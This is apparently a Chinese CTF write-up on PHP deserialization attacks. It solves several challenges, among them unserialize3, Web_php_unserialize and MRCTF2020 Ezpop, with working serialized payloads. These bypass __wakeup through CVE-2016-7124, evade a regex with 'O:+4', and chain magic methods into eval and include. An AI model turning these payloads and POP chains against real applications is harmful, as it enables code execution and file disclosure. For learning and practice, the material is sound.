CTF_Web：反序列化详解（二）CTF经典考题分析

0x00 CTF中的反序列化题目

这类题目中主要是利用反序列化各种魔术方法的绕过或调用，从而构造符合条件的序列化字符串，完成特定的功能，在这一点上对于整个代码段的执行流程要很清楚。我们先从最简单的开始看起。

0x01 攻防世界unserialize3

题目显示的源码为：

class xctf{ 
    public $flag = '111';
    public function __wakeup(){
    exit('bad requests');
}
?code=

在这里我们可以看到只有一个魔术方法，而__wakeup()魔术方法是反序列化之前检查执行的函数，也就是说，不管传入什么，都会优先执行__wakeup()方法，但这里针对__wakeup()方法有一个CVE漏洞，CVE-2016-7124，在传入的序列化字符串在反序列化对象时与真实存在的参数个数不同时会跳过执行，即当前函数中只有一个参数$flag，若传入的序列化字符串中的参数个数为2即可绕过。
如下:

<?php
class xctf{ 
    public $flag = '111';
}
$a = new xctf();
echo serialize($a);

得到结果O:4:"xctf":1:{s:4:"flag";s:3:"111";}，将类xctf中的参数1修改为2，提交code，得到flag。

0x02 攻防世界Web_php_unserialize

题目源码为:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

这里首先是一个代码审计，代码部分比较简单，大佬肯定一眼就知道这里只需要绕过preg_match正则和__wakeup函数即可，因为这里weakup会将马上就要反序列化的字串中file给你替换为index，这样就回到现在的页面了。
首先是正则绕过：/[oc]:\d+:/i
这段正则的意思是匹配所有的以o、c、O、C开头，加冒号:，加数字、再加冒号:的字符串，忽略大小写，也就是o:4:这部分序列化串开头的匹配。这里使用+4绕过，这是因为这样即绕过了这里正则的条件，由不会改变o后面的值，因为+4与4是相同的，不会影响反序列化的结果。
其次是wakeup，wakeup只需要把序列化字串的对象属性个数1改为别的数字就行了，但是注意这里file 的类型是private，所以打印出来的串是有不可见字符%00的，不要复制出来自己base，不然结果就不一样了。
O:+4:"Demo":2:{s:10:"%00Demo%00file";s:8:"fl4g.php";}

$a= new Demo('fl4g.php');
$b = serialize($a);
$b = str_replace("O:4","O:+4",$b);
$b = str_replace(":1:",":2:",$b);
echo base64_encode($b);

最终结果为：index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

0x03 XMAN2017 unserialize

访问题目提示get传参code

于是试试传入1，得到提示
hint: flag.php
访问得到下一步提示：

访问help.php，得到部分源码：

代码整理后得到：

<?php
class FileClass
{ 
public $filename = 'error.log'; 
public function __toString(){ 
return file_get_contents($this->filename); 
    } 
}

也就是说这是一个触发Tostring 的题目，前面的知识中我们也提到这个函数触发于对象被当作字符串时，一般在echo等打印函数时就可以，这里先使用

$a = new FileClass();
echo serialize($a);

传给code做测试，发现返回：

也就是说，每次序列化之后都触发了其中的Tostring函数，返回文件的内容，只不过这里没有error,log，那么我们把内容替换为flag.php即可。
传入?code=O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}查看源码拿到flag。

0x04 pop链构造

以下部分内容代码来自F12sec ，作者spaceman。感谢大佬的分享，通过几个例子来一起学习反序列化的执行流程

<?php
highlight_file(__FILE__);
class pop {
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new hello();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class hello {
    function action() {
        echo "hello pop ";
    }
}
class shell {
    public $data;
    function action() {
        eval($this->data);
    }
}
$a = new pop();
@unserialize($_GET['s']);

在这段代码中，可以很容易看到危险函数为shell类中的action方法，而第一个类pop在创建时会自动去new一个hello类，并在销毁时调用hello的action方法，我们只需要利用销毁时自动调用的这一特性。使本来的执行流程改变，具体为：
new pop --> new hello --> action(hello)
new pop --> new shell --> action(shell)
于是上面的代码就变成了

<?php
highlight_file(__FILE__);
class pop {
    public $ClassObj;
    function __construct() {
        $this->ClassObj = new shell();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}
class hello {
    function action() {
        echo "hello pop ";
    }
}
class shell {
    public $data ="phpinfo();" ;
    function action() {
        eval($this->data);
    }
}
$a = new pop();
echo serialize($a);

这样一来就完成了执行流程的改变，我们把最后的结果O:3:"pop":1:{s:8:"ClassObj";O:5:"shell":1:{s:4:"data";s:10:"phpinfo();";}}传入s中，就得到了执行phpinfo后的界面，完成了执行流程的改变。

0x05 MRCTF2020Ezpop

题目源码为:

<?php

class Modifier {
    protected  $var = "flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        echo "__invoke";
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        echo "__tostring";
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }

    public function __get($key){
        echo "__get";
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

这里代码比较长，但我们一个个分析，都是之前总结过的知识点。

首先是Modifier类:

class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

这里我们看到只有一个魔术方法invoke，前面我们总结了，调用invoke 的方式就是将对象以函数的方式访问，所以modifier类利用的姿势就是：

$a = new Modifier();
$a();

其次是show类：

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

这里可以看到魔术方法为tosting和wakeup，tostring需要对象以字符串方式被访问，而这一类中刚好在初始化时construct中使用了echo；这里的wakeup只要传参Show中的值不包含指定字符即可。

第三个是Test类

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

test类中的魔术方法__get需要我们访问一个不存在的属性时就会调用，且会将自己类中p的值当作函数执行。
利用的姿势就为：

$b = new Test();
$b->a;

访问不存在的属性，哪里的属性不存在呢，在Show类中tostring调用的$this->str->source，而Test类没有source属性，那么让Show类中的str属性成为Test类的对象即可。
也就是说这里应该为：

$a = new Show("123");
$a->str = new Test();

其实到了这里就比较明朗了，好似回到了第一个类modifier的执行条件，将一个值当作函数执行。最终的目的也就是把想要查看的文件使用 Modifier类中的include($value);函数包含。
所以执行的流程就是:
Show中执行tostring——>访问到了Test中的source——>而Test中没有source——>于是执行了__get魔法——>将this->p当作函数执行，这里都可以看出来this->p就应该是第一个类的利用点就应该是Modifier的对象。从而包含想要包含的文件。
代码为：

<?php

class Modifier {
    protected  $var = "flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        echo "__invoke";
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        echo "__tostring";
        return "556"; //注意这里把原来的this->str->source更改，如果不改，在new第二次Show的时候就会提示Method Show::__toString() must return a string value 
    }

    public function __wakeup(){  //这里两次传入的source参数都不包含正则的内容，所以没有触发过滤函数。
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = new Modifier();
    }

    public function __get($key){
        echo "__get";
        $function = $this->p;
        return $function();
    }
}
$a = new Show("afcc"); //在这个题目中输入什么都无所谓，都不会影响后续的结果
$a->str = new Test();
//echo $a;这里也就是要再次调用Show输出自己，才会使echo成立。
$c = new Show($a);
echo urlencode(serialize($c)); //这里urlencode是为了防止 protected 对象对结果造成影响。

最终输入
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Bs%3A4%3A%22afcc%22%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
也就是序列化后的字串，注意*var前面的%00。

当这个题目做完的时候我们反过来看，其实这里面的wakeup没有起到作用，因为对于最后的序列化串来说Show类中的source没有起到任何作用，就算在反序列化之前被修改，也不影响后续的输出。如果把他改为

this->str = "index.php";

这时就需要考虑如何绕过的问题了。

0x06 小结

这几天学习反序列化之后，发现主要的知识点集中于各个魔术方法的调用时机、正则匹配的绕过和pop链的构造，学习比较缓慢，需要慢慢积累。
pop链在构造的时候首先

分析每个函数是不是有存在利用的点、怎么利用，例如wakeup、get等魔术方法
他们之间有没有关联、比如第一个的利用条件正好是第二个的初始化内容等等
最后我们需要控制的eval、include等危险函数来倒推利用。

还是需要多加练习才能更深入的掌握。